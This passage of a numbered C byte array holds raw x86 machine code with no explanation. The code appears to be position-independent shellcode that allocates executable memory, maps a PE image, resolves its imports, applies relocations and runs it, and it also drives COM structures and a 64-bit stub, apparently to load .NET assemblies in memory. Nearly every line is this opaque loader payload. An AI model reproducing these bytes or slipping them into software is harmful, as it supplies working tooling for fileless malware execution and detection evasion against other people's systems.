345 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00,
346 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
347 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57,
348 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b,
349 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47,
350 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39,
351 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19,
352 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00,
353 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
354 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b,
355 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff,
356 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08,
357 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04,
358 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85,
359 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0,
360 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0,
361 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24,
362 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33,
363 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00,
364 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01,
365 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14,
366 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0,
367 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14,
368 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e,
369 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74,
370 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01,
371 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b,
372 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00,
373 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33,
374 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00,
375 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00,
376 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33,
377 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08,
378 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00,
379 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00,
380 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84,
381 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
382 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a,
383 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00,
384 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50,
385 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50,
386 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00,
387 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84,
388 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44,
389 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40,
390 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10,
391 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94,
392 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff,
393 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22,
394 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86,
395 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c,
396 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86,
397 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c,
398 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84,
399 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
400 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
401 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00,
402 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff,
403 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80,
404 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76,
405 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03,
406 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58,
407 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84,
408 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8,
409 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84,
410 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
411 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78,
412 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83,
413 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00,
414 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b,
415 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85,
416 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb,
417 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53,
418 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b,
419 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01,
420 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53,
421 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c,
422 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05,
423 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89,
424 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00,
425 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0,
426 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85,
427 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44,
428 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24,
429 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81,
430 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24,
431 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0,
432 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24,
433 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24,
434 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24,
435 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48,
436 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24,
437 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
438 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01,
439 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d,
440 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d,
441 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c,
442 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7,
443 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84,
444 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24,
445 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4,
446 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00,
447 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00,
448 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00,
449 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89,
451 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24,
452 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20,
453 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7,
454 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84,
455 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24,
456 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14,
457 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19,
458 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24,
459 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66,
460 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b,
461 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40,
462 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89,
463 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55,
464 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f,
465 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3,
466 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03,
467 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8,
468 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c,
469 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89,
470 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00,
471 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c,
472 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50,
473 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6,
474 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10,
475 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa,
476 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05,
477 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83,
478 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24,
479 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b,
480 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75,
481 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b,
482 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c,
483 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01,
484 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66,
485 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00,
486 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c,
487 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b,
488 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
489 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43,
490 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83,
491 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18,
492 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04,
493 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00,
494 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b,
495 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b,
496 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31,
497 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
498 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b,
499 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59,
500 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89,
501 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00,
502 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20,
503 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81,
504 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00,
505 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50,
506 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00,
507 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00,
508 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08,
509 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00,
510 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4,
511 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb,
512 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03,
513 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0,
514 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40,
515 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81,
516 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00,
517 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d,
518 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40,
519 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00,
520 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c,
521 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e,
522 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e,
523 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44,
524 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53,
525 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24,
526 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff,
527 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8,
528 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d,
529 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a,
530 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac,
531 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b,
532 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04,
533 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77,
534 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0,
535 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c,
536 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75,
537 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b,
538 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff,
539 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6,
540 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57,
541 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75,
542 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51,
543 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b,
544 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24,
545 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00,
546 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8,
547 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00,
548 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8,
549 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74,
550 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe,
551 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07,
552 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d,
553 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b,
554 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10,
555 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18,
556 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff,
557 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00,
558 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00,
559 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff,
560 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24,
561 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91,
562 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24,
563 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50,
564 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12,
565 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18,
566 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00,
567 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08,
568 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96,
569 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04,
570 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00,
571 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff,
572 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44,
573 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10,
